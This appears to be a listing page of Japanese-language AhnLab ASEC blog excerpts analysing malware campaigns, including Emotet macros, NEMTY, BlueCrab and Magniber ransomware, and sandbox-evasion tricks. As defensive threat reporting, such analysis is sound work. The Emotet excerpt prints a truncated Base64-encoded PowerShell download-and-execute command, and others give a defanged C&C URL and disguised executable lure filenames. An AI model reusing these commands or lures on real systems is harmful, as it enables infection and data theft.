見積書に偽装した情報流出型マルウェアが拡散中(Google Drive利用) Posted By ATCP , 2020년 03월 04일 AhnLab ASEC 分析チームは2020年3月4日、見積書に偽装した情報奪取型(キーボード入力値の流出)マルウェアが拡散していることを確認した。2次マルウェアのダウンロードアドレスが、一般人がよく使用する Google Drive(https://drive.google.com) を利用している点も、正常な行為に偽装するためのものと推定される。このマルウェアは、当社が以前公開した AutoCAD 図面ファイル(dwg)に偽装した以下のマルウェアと同じタイプであると確認された。 以下の [図1] のように、メール内部に正常な見積書の画像(img)ファイルが添付されており、その画像ファイル内部には不正な実行ファイルが存在する。 不正なファイルが実行されると、以下のように自身をコピーして、コピーしたファイルを実行する機能の…
偽のWindows画面と共にインストールされる新種のランサムウェア、韓国国内で発見(*.rezm拡張子) Posted By ATCP , 2020년 03월 02일 AhnLab ASEC 分析チームは2020年3月2日、偽の Windows アップデート画面と共にインストールされる新種のランサムウェアを発見した。このランサムウェアは、既に韓国の国内で広く出回っている Bluecrab、Nemty、Paradise というランサムウェアと同じパッカー(Packer)を使用して拡散しており、暗号化されたファイルは拡張子に .rezm が追加される特徴を持つ。 ファイルを実行すると、以下のアドレスから Fake の Windows アップデートファイルをダウンロードして実行し、ユーザーには Windows…
特定環境でのみ動作する、新たな動的解析の回避手法 Posted By ATCP , 2020년 02월 27일 AhnLab ASEC 分析チームは、活発に出回っているマルウェアを監視している最中に、新たな形式の動的解析回避手法を確認した。最近、多数出回っているマルウェアは、診断を回避するための目的でマルウェアの実行環境を確認したあと、条件を満たしている場合は Crash を発生させて動作しないようにする。 今回紹介する手法は、特定のアセンブリ言語を使用する方法と、サイズが大きいメモリの割り当てが可能かどうかを確認する方法である。 1. AVX の対応可否(VXORPSコマンド) 「VXORPS」コマンドを使用して AVX に対応していない環境で動作する場合、 Crash…
ファイルレス形式「BlueKeep」の脆弱性V3行為検出映像 Posted By ATCP , 2019년 12월 17일 2019年5月14日、MicrosoftはBlueKeep(CVE-2019-0708) の脆弱性に対するパッチのために緊急のセキュリティ更新プログラムを通知した。また、すでにサービスのサポートを終了した OS(Windows XP、Windows Vista、Windows Server2003) までの更新を例外的に提供し、BlueKeep の脆弱性を2017年の EternalBlue の脆弱性と同じく、「Wormable(ワームの侵入を許す)」脆弱性として悪用される可能性があると警告した。 BlueKeep は、クライアントとサーバー間の…
V3 Lite 4.0 新しい検出機能の紹介:マグニバー(Magniber)ランサムウェアのブロック Posted By ATCP , 2019년 12월 10일 ファイルレス(Fileless)形式で動作するマグニバー(Magniber)ランサムウェアは、2018年4月にASEC のブログを通して復旧ツールを配布した後、暗号化方式の変化によって2018年6月から現在までに登場しているすべての形式において、復旧が不可能な形態で拡散している。現在も国内での被害事例が多い状況であり、IEの脆弱性(CVE-2018-8174)を利用して拡散しているため、IEユーザーの場合はセキュリティパッチの適用が必須とされている。 AhnLab ASEC 分析チームでは、Magniber ランサムウェアの拡散場所を継続的に監視しており、1)11月11日以降、動作方式の変化を確認した。どのような動作方式の変化があったのかを説明し、V3 Lite 4.0 製品に新しく適用された「プロセスのメモリ診断」検出機能による2)暗号化ブロックのプロセスを紹介する。 Magniber ランサムウェアは、IEブラウザの脆弱性を利用した感染により(別途ファイル生成を行わずに)ファイルレス形式で動作し、ランサムウェア行為を実行する主体は、感染システムの多数の正常なプロセスである。すなわち、一度感染すると治療が非常に難ししランサムウェアであると言うことができる。 以下の…
NEMTYランサムウェア、v2.2国内で発見! Posted By ATCP , 2019년 12월 02일 2019年12月2日、ASEC 分析チームはNEMTYランサムウェアのバージョンが2.0から2.2にアップデートされて拡散したことを発見した。「履歴書」または「不当電子商取引違反行為案内」を装った拡散方式を含め、感染除外国、感染対象、感染除外ファイル、フォルダ等すべてが既存のNEMTY REVENGE 2.0と同一である。 [拡散ファイル名] \カン・ジュギョン\履歴書\ポートフォリオ.hwp.exe \カン・ジュギョン\履歴書\履歴書.hwp.exe \イ・シウ\___\___.hwp.exe \チャン・ミンウ\___\___.hwp.exe 既存のバージョンと異なる点は、以下のようにミューテックス名が変更されたことである。 NEMTY 2.0…
素早く変化するBlueCrabランサムウェアの感染方式(notepad.exe) Posted By ATCP , 2019년 11월 05일 AhnLab ASEC 分析チームは、フィッシングダウンロードページによって拡散している JavaScript 形式の BlueCrab(=Sodinokibi) ランサムウェアの観察を続けている。このフィッシングダウンロードページは、ユーティリティダウンロードページに偽装しており、[図1] のように Google 検索の上部に表示されるケースも発見されている。これらの感染方式は、過去の GandCrab ランサムウェアから使用されている方法であり、すでに広く知られている内容である。…
「給与明細書」メールで拡散しているExcel文書に注意 Posted By ATCP , 2019년 10월 18일 10月17日から国内企業をターゲットにダウンローダーのマルウェアを拡散させるスパムメールが多数出回っており、ユーザーの注意が必要である。 現在確認されている国内企業をターゲットとして出回っているスパムメールの件名は「10月給与明細書」と「XX見積書」である。このスパムメールは「QF001_1093_101819.xls」、「P001_102019_4472.xls」のようなファイル名のMicrosoft Office Excel文書のファイルを添付、もしくはOneDriveに偽装したフィッシングページからダウンロードさせる。メールの送信者は「キム・ソナ」であり、送信者とメール件名の内容は異なる可能性が高い。 不正Excel文書を開くと次のような画面が表示され、ユーザーによるマクロの有効化を誘導する。マクロの有効化を許可した場合、内部に含まれている不正なマクロが実行される。 マクロの有効化を誘導する画像マクロを有効化すると、不正なマクロの実行以外にも上記のようなロード画面が表示される Excel文書に含まれているマクロコードの機能は、不正なDLLをドロップした後にロードして実行する方式である。 以降、不正なDLLをロードして実行するルーティンが継続する。すなわち、実際の不正な行為はexcel.exeプロセスに(内部の不正なdll)よって行われる。マルウェアはx86、x64環境に応じてそれぞれ異なるバージョンのDLLをドロップおよびロードするが、実際の機能は同じである。 DLLマルウェアはC2に接続してコンピュータ名、ユーザー名、OSバージョンおよびアーキテクチャ等の基本情報を送信した後、ダウンローダーの機能を実行することができる。現在、以下のC2への接続は不可能であり、ダウンロードされるマルウェアは確認できない。 C&Cサーバー:https://windows-wsus-update[.]com/f1711 正常なC2への接続が行われた場合、ダウンロードされるマルウェアを実行する方式以外にも、別のプロセスにインジェクションする機能も存在する。すなわち、excel.exe内部で実行されるダウンロードマルウェア以外に、別のマルウェアも他の正常なプロセス内で実行される場合がある。 アンラボは、スパムメールとして出回っている不正なドキュメントファイルとダウンロードされる実行ファイルを、次のように診断している。また、不正Wordファイルがアクセスする不正なC&CアドレスをASDネットワークを通して遮断している。…
[注意] 文書形式で拡散するエモテット(Emotet)マルウェア Posted By ATCP , 2019년 10월 11일 AhnLab ASEC分析チームは、国内ユーザーをターゲットとした不正なVBAマクロが含まれているWordファイルが出回っていることを確認した。この不正なVBAマクロは、WMIによってpowershellを実行し、Emotetマルウェアをダウンロードさせる。Wordファイルを開くと、[図1]のようにVBAマクロを実行するように誘導するメッセージの画像が存在する。誘導メッセージは[図2]のように様々な形式のものが出回っている。 現在出回っているVBAマクロは[図3]のようにダミーコードおよびコメントを利用して難読化されており、[図4]は難読化が解除されたVBAマクロである。 コードを分析した結果、昨年の11月にEmotetマルウェアを含んだVBAマクロはcmdによってpowershellを実行していた一方で、現在拡散しているマクロはWMI(winmgmts:Win32_Process)によってpowershellを実行する方式に変更されたことを確認した。 WMIによって実行されるpowershellコマンドは[表1]のようにBase64でエンコードされた形式であり、デコードされたコマンドは[図6]の通りである。このコマンドは5つのURLのうちアクセス可能なURLを通してEmotetマルウェアをダウンロードし、UserProfileパスに77.exeというファイル名で保存して実行する機能を遂行する。この機能は、当社のセキュリティソフトの行為検出によってブロックされる。 powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALg…(省略)…ABiADUAMQAwADYAYgBjADQAMABjADcANAA9ACcAeABjADEAYwAxADAAeAAyADgAOAAwADMANgAnAA== [表1] エンコードされたpowershellコマンド ダウンロードされたEmotetマルウェアは、「–XXXXXXXX」形式の引数値によって実行されることが特徴である。引数値はファイルパスをもとに計算され、当該引数値が存在しない場合、再度実行する。…
Ryukと類似したマルウェアに含まれたAhnLab文字列の意味!(特定国がターゲット?) Posted By ATCP , 2019년 09월 18일 AhnLab ASEC分析チームは最近、「AhnLab」の文字列を含む情報流出マルウェアが拡散していることを確認した。このマルウェアには従来の Ryuk ランサムウェアと同じ文字列が使用され、内部コードのフローが類似しており、Ryuk ランサムウェアと関連しているものと把握されている。また、当該サンプルを分析した結果、特定国をターゲットにして製作されたマルウェアと推定されるいくつかの根拠が発見された。 昨年8月に発見された Ryuk ランサムウェアは、ファイルの拡張子を「.RYK」に変更して「RyukReadMe.txt」という名前のランサムノートを生成し、AhnLab フォルダを暗号化対象から除外している。この情報流出マルウェアも、ファイル名およびフォルダ名に AhnLab 文字列が存在する場合、流出対象から除外している。 マルウェアを実行すると、引数で与えられた文字列のパスのファイルを削除する。自身をドロップしたファイルを削除して追跡を困難にする用途に使用されることがある。…
